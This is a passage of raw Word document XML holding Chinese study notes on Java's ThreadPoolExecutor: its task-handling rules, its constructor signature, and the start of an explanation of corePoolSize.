          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00C90185" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD5239" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>如果当前线程数小于核心线程数，每当有新任务进来，创建新的线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5239" w:rsidRPr="000335A0" w:rsidRDefault="004C21D5" w:rsidP="000335A0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="00C90185" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD5239" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>当当前线程数大于等于核心线程数，</w:t>
      </w:r>
      <w:r w:rsidR="00847567" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>若缓存队列未满，</w:t>
      </w:r>
      <w:r w:rsidR="00BD5239" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>则将任务放入缓存队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5239" w:rsidRPr="000335A0" w:rsidRDefault="00C90185" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>当当前线程数大于等于核心线程数</w:t>
      </w:r>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>若缓存队列已满。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C90185" w:rsidRPr="000335A0" w:rsidRDefault="00C90185" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   (3.1) </w:t>
      </w:r>
      <w:r w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>当前线程数小于最大线程数，则创建新的线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C90185" w:rsidRPr="00E97A52" w:rsidRDefault="000335A0" w:rsidP="00E97A52">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00C90185" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(3.2) </w:t>
      </w:r>
      <w:r w:rsidR="00C90185" w:rsidRPr="000335A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>当前线程数目大于等于最大线程数目，则抛出异常</w:t>
      </w:r>
      <w:r w:rsidR="00C90185">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74B53" w:rsidRDefault="00992CA5" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00992CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的完整构造方法的签名是：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74B53" w:rsidRDefault="00CB7B9F" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00992CA5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>int corePoolSize,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74B53" w:rsidRDefault="00992CA5" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB7B9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int maximumPoolSize, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74B53" w:rsidRDefault="00E74B53" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB7B9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00992CA5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">long keepAliveTime, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74B53" w:rsidRDefault="00E74B53" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB7B9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00992CA5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TimeUnit unit, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74B53" w:rsidRDefault="00E74B53" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB7B9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00992CA5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BlockingQueue&lt;Runnable&gt; workQueue, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E74B53" w:rsidRDefault="00E74B53" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB7B9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00992CA5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ThreadFactory threadFactory, RejectedExecutionHandler handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00992CA5" w:rsidRPr="00992CA5" w:rsidRDefault="00992CA5" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00992CA5" w:rsidRPr="00F41A4C" w:rsidRDefault="00992CA5" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Executors</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>类的底层实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00F41A4C" w:rsidRDefault="00B51D31" w:rsidP="00992CA5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="009B14DF" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidR="00B51D31" w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类可设置的参数主要有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>核心线程数，核心线程会一直存活，即使没有任务需要处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。当线程数小于核心线程数时，即使现有的线程空闲，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线程池也会优先创建新线程来处理任务，而不是直接交给现有的线程处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。核心线程在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>allowCoreThreadTimeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
